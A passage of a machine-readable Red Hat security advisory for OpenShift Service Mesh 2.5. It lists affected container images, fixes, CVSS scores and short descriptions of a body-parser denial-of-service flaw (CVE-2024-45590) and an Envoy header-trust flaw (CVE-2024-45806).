"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"acknowledgments": [
{
"names": [
"Mike Whale"
]
},
{
"names": [
"James Force"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2024-45806",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2024-09-20T00:40:20.976812+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313683"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy\u0027s default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Potential to manipulate `x-envoy` headers from external sources",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat\u0027s CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
